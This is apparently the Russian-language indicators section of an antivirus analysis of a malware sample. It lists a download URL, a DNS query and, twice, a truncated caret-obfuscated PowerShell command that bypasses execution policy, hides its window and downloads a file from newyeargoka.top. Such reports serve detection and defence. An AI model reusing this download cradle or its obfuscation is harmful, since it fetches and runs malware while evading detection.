Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwErsHELl.E^xE -^EXe^cuTiO^NP^olIcy ^Byp^As^s ^-^NoP^rof^i^LE^ ^-WiNdowSTY^lE^ hIdDen^ (^N^ew-OBJE^CT^ ^s^YsTEM.^n^e^t^.^WeBCl^iENt)^.^DoWnlo^A^Dfi^le(^'http://newyeargoka....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "pOwErsHELl.E^xE -^EXe^cuTiO^NP^olIcy ^Byp^As^s ^-^NoP^rof^i^LE^ ^-WiNdowSTY^lE^ hIdDen^ (^N^ew-OBJE^CT^ ^s^YsTEM.^n^e^t^.^WeBCl^iENt)^.^DoWnlo^A^Dfi^le(^'http://newyeargoka....' (со скрытым окном)